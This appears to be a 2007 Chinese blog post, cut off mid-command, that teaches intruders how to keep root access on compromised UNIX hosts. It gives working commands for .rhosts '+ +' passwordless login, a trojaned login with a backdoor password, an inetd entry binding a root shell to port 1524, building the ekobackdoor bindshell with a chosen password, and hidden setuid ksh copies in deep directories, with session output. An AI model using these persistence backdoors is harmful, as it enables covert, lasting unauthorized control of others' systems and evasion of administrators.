UNIX系统后门的安放和日志的擦除

    [多云 November 24, 2007 20:39 | by ]
来源:IT lab
当我们通过某种手段控制一个主机时,为了使自己能再次光顾这台计算机,我们通常在这个机器上留下后门,以便我们再次访问.一个做得好的后门,即使在入侵被管理员发现后,仍然能让你再次访问到主机.
  本文的意旨是让你学会如何在完全控制系统后保留自己的根用户权限,下面介绍一下我常用的制作后门的手法,不会也不可能覆盖到所有可能的方法,请原谅.
  1.Rhosts + + 后门
  在连网的Unix机器中,象Rsh和Rlogin这样的服务是基于rhosts文件里的主机名使用简单的认证方法. 用户可以轻易的改变设置而不需口令就能进入. 入侵者只要向可以访问的某用户的rhosts文件中输入"+ +", 就可以允许任何人从任何地方无须口令便能进入这个帐号. 特别当home目录通过NFS向外共享时, 入侵者更热中于此. 这些帐号也成了入侵者再次侵入的后门. 许多人更喜欢使用Rsh, 因为它通常缺少日志能力. 许多管理员经常检查 "+ +", 所以入侵者实际上多设置来自网上的另一个帐号的主机名和用户名,从而不易被发现.
  例如:
  
   # echo + + > /usr/bin/.rhosts
  
  # cat /usr/bin/.rhosts
  
  + +
  
  # rlogin -l bin localhost
  
  将不用输入密码直接用bin帐号rlogin登陆进你的机器.
  
  2.Login后门
  在Unix里,login程序通常用来对telnet来的用户进行口令验证. 入侵者获取login.c的原代码并修改使它在比较输入口令与存储口令时先检查后门口令. 如果用户敲入后门口令,它将忽视管理员设置的口令让你长驱直入. 这将允许入侵者进入任何帐号,甚至是root.由于后门口令是在用户真实登录并被日志记录到utmp和wtmp前产生一个访问的, 所以入侵者可以登录获取shell却不会暴露该帐号. 管理员注意到这种后门后, 便用"strings"命令搜索login程序以寻找文本信息. 许多情况下后门口令会原形毕露. 入侵者就开始加密或者更好的隐藏口令, 使strings命令失效. 所以更多的管理员是用MD5校验和检测这种后门的.
  
  一般的rootkit包里都有login后门程序.
  
  3.服务进程后门
  inetd 进程负责监听各个TCP和UDP端口的连接请求,并根据连接请求启动相应的服务器进程。该配置文件 /etc/inetd.conf 很简单,基本形式如下:
  
  (1) (2) (3) (4) (5) (6) (7)
  
  shell stream tcp nowait root /usr/sbin/in.rshd in.rshd
  
  login stream tcp nowait root /usr/sbin/in.rlogind in.rlogind
  
  exec stream tcp nowait root /usr/sbin/in.rexecd in.rexecd
  
  comsat dgram udp wait root /usr/sbin/in.comsat in.comsat
  
  talk dgram udp wait root /usr/sbin/in.talkd in.talkd
  
  1:第一栏是服务名称。服务名通过查询 /etc/services 文件(供 TCP 和 UDP 服务使用)或 portmap 守护进程(供 RPC 服务使用)映射成端口号。RPC(远程过程调用)服务由 name/num 的名字格式和第三栏中的 rpc 标志识别。
  
  2:第二栏决定服务使用的套接口类型:stream、dgram 或 raw。一般说来,stream 用于 TCP 服务,dgram 用于 UDP, raw 的使用很少见。
  
  3:第三栏标识服务使用的通信协议。允许的类型列在 protocols 文件中。协议几乎总是是 tcp 或 udp。RPC 服务在协议类型前冠以 rpc/。
  
  4:如果所说明的服务一次可处理多个请求(而不是处理一个请求后就退出),那么第四栏应置成 wait,这样可以阻止 inetd 持续地派生该守护进程的新拷贝。此选项用于处理大量的小请求的服务。如果 wait 不合适,那么在本栏中填 nowait。
  
  5:第五栏给出运行守护进程的用户名。
  
  6:第六栏给出守护进程的全限定路径名。
  
  7:守护进程的真实名字及其参数。 如果所要处理的工作微不足道(如不需要用户交互),inetd 守护进程便自己处理。此时第六、七栏只需填上 internal 即可。所以,要安装一个便利的后门,可以选择一个不常被使用的服务,用可以产生某种后门的守护进程代替原先的守护进程。例如,让其添加 UID 0 的帐号,或复制一个 suid shell。
  
  当然我们有一个更简单的方法,
  
  下面的操作bind root shell 1524端口.
  
  # echo ingreslock stream tcp nowait root /bin/ksh ksh -i > /tmp/.x
  
  # /usr/sbin/inetd -s /tmp/.x
  
  # rm -f /tmp/.x
  
  # telnet localhost 1524
  
  Trying 127.0.0.1...
  
  Connected to localhost. Escape character is ^].
  
  #
  
  # id
  
  ksh: id^M: not found
  
  # id;
  
  uid=1002(gao) gid=1(other) euid=0(root)
  
  ksh: ^M: not found
  
  # exit;
  
  Connection closed by foreign host.
  
  #
  
  注意,这样bind的shell在telnet上去后,你要在你想执行的命令后面添加一个" ; "号.即你要执行id命令的输入应为: id;
  
  当然你也可以把ingreslock换成其他服务.具体请查看/etc/services寻找对应的服务名和端口.
  
  下面为部分/etc/services内容.
  
  # cat /etc/services
  
  #ident "@(#)services 1.20 98/07/08 SMI" /* SVr4.0 1.8 */
  
  #
  
  # Network services, Internet style
  
  #
  
  tcpmux 1/tcp
  
  echo 7/tcp
  
  echo 7/udp
  
  discard 9/tcp sink null
  
  discard 9/udp sink null
  
  systat 11/tcp users
  
  daytime 13/tcp
  
  daytime 13/udp
  
  netstat 15/tcp
  
  chargen 19/tcp ttytst source
  
  chargen 19/udp ttytst source
  
  ftp-data 20/tcp
  
  ftp 21/tcp
  
  telnet 23/tcp
  
  smtp 25/tcp
  
  mail time 37/tcp timserver
  
  time 37/udp timserver
  
  name 42/udp nameserver
  
  whois 43/tcp nicname # usually to sri-nic
  
  domain 53/udp
  
  domain 53/tcp
  
  bootps 67/udp # BOOTP/DHCP server
  
  bootpc 68/udp # BOOTP/DHCP client
  
  
  4.port bind suid Shell 后门
  入侵者可能在任意端口bind suid Shell后门. 许多情况下,他们用口令进行保护以免管理员连接上后立即看到是shell访问. 管理员可以用netstat命令查看当前的连接状态, 那些端口在侦听, 目前连接的来龙去脉.
  
  我提供的压缩包door.zip里有一个ekobackdoor-v1.1.tar,为linux下的bindshell程序包.大家可以自己编译一下.
  
  方法为,
  
  修改ekobdoor.c
  
  查找
  
  #define PASSWORD "ekorulez"
  
  把"ekorulez" 改成你要的密码.
  
  比如
  
  #define PASSWORD "cnhonker"
  
  把ekobackdoor-v1.1.tar解压然后make
  
  就可以了.
  
  具体使用方法为:
  
  # ./ekobdoor [opcion] [argumento]
  
  下面为不用输入密码的
  
  # ./ekobdoor -b 31337
  
  c:\ telnet 200.45.0.115 31337
  
  Trying 200.45.0.115...
  
  Connected to 200.45.0.115.
  
  Escape character is ^].
  
  #
  
  下面为需要输入密码的.
  
  # ./ekobdoor -s 31337
  
  c:\ telnet 200.45.0.115 31337
  
  Trying 200.45.0.115...
  
  Connected to 200.45.0.115.
  
  Escape character is ^].
  
  cnhonker --->输入密码.
  
  #
  
  这里的31337你可以改成你想要的端口.
  
  当然它还有更多其他功能.具体你用 -h 查看
  
  #./ekobdoor -h
  
  5.suid shell
  
  在 /tmp 或者其他的目录下放置 suid shell。以后只要你运行这个程序,就会轻易得到根用户权限。
  
  #cp /bin/ksh /tmp/.sh
  
  #chown root:root /tmp/.sh
  
  #chmod +s /tmp/.sh
  
  当你运行/tmp/.sh时,
  
  这里我们用ksh shell是因为ksh 可以suid.换成其他的shell也许可能不行,具体看各个主机的情况而定.一般我们使用ksh.我们使用的溢出程序用来获得root权限的,也一般是溢出后执行/bin/ksh.
  
  $id
  
  uid=1002(oracle) gid=1(other)
  
  $/tmp/.sh
  
  #
  
  #id
  
  uid=1002(oracle) gid=1(other) euid=0(root) egid=0(root)
  
  我们又是root了.
  
  当然,为了更加隐蔽,我们不能把suid shell 放在/tmp
  
  因为它是很容易被发现的.
  
  我们应该放在深层的目录里面.
  
  比如:
  
  /usr/X11/include/X11/
  
  或者
  
  /usr/lib/
  
  等等
  
  通常我做的是:
  
  # mkdir /usr/lib/lib/ mkdir /usr/lib/lib/...
  
  # cp /bin/ksh /usr/lib/lib/.../lib
  
  # chown root:sys /usr/lib/lib/.../li
Tags: , ,
Technology | Comments(0) | Trackbacks(0) | Reads(6061)
Add a comment
Emots
emotemotemotemotemot
emotemotemotemotemot
emotemotemotemotemot
emotemotemotemotemot
emotemotemotemotemot
Enable HTML
Enable UBB
Enable Emots
Hidden
Nickname   Password   Optional
Site URI   Email   [Register]
               

Security code Case insensitive